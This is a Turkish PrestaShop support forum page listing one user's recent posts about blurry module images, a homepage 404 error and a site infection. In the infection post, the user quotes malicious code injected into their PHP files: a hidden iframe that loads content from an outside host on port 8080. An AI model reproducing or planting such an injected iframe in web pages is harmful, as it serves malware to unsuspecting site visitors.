Presta-TR

Forumumza kayıt olarak hem destek alabilir hem de destek verebilirsiniz!

Şimdiden aramıza hoş geldiniz.

ScAp kullanıcısının son içeriği

1. S

yeni modülde resimlerim bulanık

Cvp: yeni modülde resimlerim bulanık Resin boyutlarıyla alakalı bir durum yok, hiçbişey değiştirmeden verdiğim yolu izleyin. Admin Panel > Ayalar > Resim Tablonun altındaki Resimler bölümünden aşağıdaki seçenekler işaretle, resimler düzgün çıkacaktır. Image quality *Use PNG for all images...
  2. S

anasayfa 404 hatası veriyor ACİL! v1.4.4.0

Merhaba, dil olarak ingilizceyi aktif ettim logoya basınca veya anasayfa linkine tıklayınca 404 veriyor. Sonra tekrar ingilizceyi pasif yapıp eski haline çevirdim yine aynı. İlk kurduğumda sql yedeği almıştım, yedeği tekrar kurdum yine aynı. Ne yaptam hata gitmiyor. Daha önceki kurulumda da...
  3. S

Prestashopta virüs var, yardım lütfen.

Cvp:Prestashopta virüs var, yardım lütfen. Bilgisayar veya host ile alakalı bir durum yok. 2 server değiştirdim, pc im de birkaç yere format yedi. indep.php ve bazı php dosyalarında bu kod oluşuyor.
  4. S

Prestashopta virüs var, yardım lütfen.

2-3 tür prestashop kuruyorum. Kurulumdan bir hafta sonra aşağıdaki kod bazı sayfalara ekleniyor. Oradanda bilgisayara bulaşıyor. Bunun hakkında bilgisi olan var mı? < iframe src="http://u0r.in:8080/ts/in.cgi?pepsi105" width=125 height=125 style="visibility: hidden" >< /iframe >
Üst Alt